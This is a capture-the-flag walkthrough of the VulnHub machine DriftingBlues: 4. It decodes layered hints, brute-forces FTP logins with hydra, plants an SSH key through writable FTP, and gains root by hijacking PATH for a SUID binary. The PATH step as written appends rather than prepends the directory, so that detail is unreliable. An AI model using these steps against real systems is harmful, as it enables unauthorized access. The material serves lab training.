DriftingBlues: 4 Write-up

Box info:

Name: DriftingBlues: 4

OS: Linux

Rated Difficulty: 🟩🟩 (easy)

Links: VulnHub


Nmap found 3 open ports: 21 (FTP), 22 (SSH) and 80 (HTTP):

$ sudo nmap -sC -sV 192.168.0.91  
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-31 17:40 EEST
Nmap scan report for 192.168.0.91
Host is up (0.00055s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
|   256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_  256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:BA:43:FC (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

First we'll visit the website on port 80:
Nothing interesting on the page itself, but the page source contains a base64-encoded string:

This text was encoded several times over; here is the result of each decoding pass:
1st decode:
go back intruder!!! dGlnaHQgc2VjdXJpdHkgZHJpcHBpbiBhU0JvYjNCbElIbHZkU2R5WlNCaGJpQmxiWEJzYjNsbFpTQk1NbXgwV201V2FtRXliSFZhTWpGb1drTTFNR1ZJVVQwPQ==

2nd decode:
tight security drippin aSBob3BlIHlvdSdyZSBhbiBlbXBsb3llZSBMMmx0Wm5WamEybHVaMjFoWkM1MGVIUT0=

3rd decode:
i hope you're an employee L2ltZnVja2luZ21hZC50eHQ=

4th decode:
/imfuckingmad.txt
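As an added example (not part of the original write-up), here is a small Python helper that peels these layers automatically. It starts from the page's first decoded string, scans each layer for a trailing base64 token, and stops when the remaining token (here the bare path) is no longer base64:

```python
import base64
import binascii
import re
from typing import List, Optional

# Shape test for a base64 token: alphabet characters plus optional '=' padding.
_B64_TOKEN = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

# The page's first decoding result: hint text followed by the next base64 layer.
PAGE_FIRST_DECODE = (
    "go back intruder!!! dGlnaHQgc2VjdXJpdHkgZHJpcHBpbiBhU0JvYjNCbElIbHZkU2R5"
    "WlNCaGJpQmxiWEJzYjNsbFpTQk1NbXgwV201V2FtRXliSFZhTWpGb1drTTFNR1ZJVVQwPQ=="
)


def try_decode(token: str) -> Optional[str]:
    """Decode one token as base64, or return None if it is not a text layer.

    Shape alone is not enough: 'back' is four alphabet characters but decodes
    to garbage bytes, so the result must also be printable UTF-8.
    """
    if len(token) % 4 != 0 or not _B64_TOKEN.match(token):
        return None
    try:
        text = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def peel_base64_layers(text: str, max_depth: int = 16) -> List[str]:
    """Return each successive decoded layer, outermost first.

    Tokens are scanned from the end because the hint text precedes the
    payload. Peeling stops when no token decodes (e.g. the final bare path)
    or after max_depth rounds, which bounds pathological input.
    """
    layers: List[str] = []
    current = text
    for _ in range(max_depth):
        candidates = (try_decode(tok) for tok in reversed(current.split()))
        decoded = next((d for d in candidates if d is not None), None)
        if decoded is None:
            break
        layers.append(decoded)
        current = decoded
    return layers


if __name__ == "__main__":
    # Numbered from 2 because the page's "1st decode" produced the input above.
    for n, layer in enumerate(peel_base64_layers(PAGE_FIRST_DECODE), start=2):
        print(f"decode {n}: {layer}")
```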

Accessing /imfuckingmad.txt we find another encoded blob, this time Brainfuck code:

Here is the decoded text:
man we are a tech company and still getting hacked??? what the shit??? enough is enough!!! 
#
...
#
/iTiS3Cr3TbiTCh.png

Visiting /iTiS3Cr3TbiTCh.png, we find a QR code, which can be read with an online reader such as https://webqr.com/

The QR code decodes to an image link: https://i.imgur.com/a4JjS76.png
The image contains a list of usernames. The next step is to brute-force the passwords of these users against the FTP service using hydra:

The first user is luther:
hydra -l luther -P /usr/share/wordlists/rockyou.txt 192.168.0.91 ftp

And his password is:

Now we can log in to FTP as luther. Inside there is a directory named hubert:

Next I'll brute-force hubert's FTP password, using the same hydra command but changing the user from luther to hubert:

And we can log in to FTP as user hubert. Since hubert owns the directory, I'll create a .ssh directory inside it with an authorized_keys file containing my id_rsa.pub key, so I can access the box over SSH.

Now we can log in to the box via SSH as user hubert with the following command:
ssh -i id_rsa hubert@<machine IP>

Now it's time for privilege escalation. Using linpeas, I found a SUID binary that we can run:

Using the strings command on the file we can see what it does:

It looks like it runs some basic commands. The problem is that it does not use absolute paths for the commands it calls, so they are looked up through $PATH, and we can abuse that.
Inside hubert's home directory create a file named cat with the following content:
#!/bin/bash
/bin/bash

Now add hubert's home directory to the PATH with the following command:
export PATH=$PATH:/home/hubert

Finally, execute the SUID file /usr/bin/getinfo again and you'll have root access:
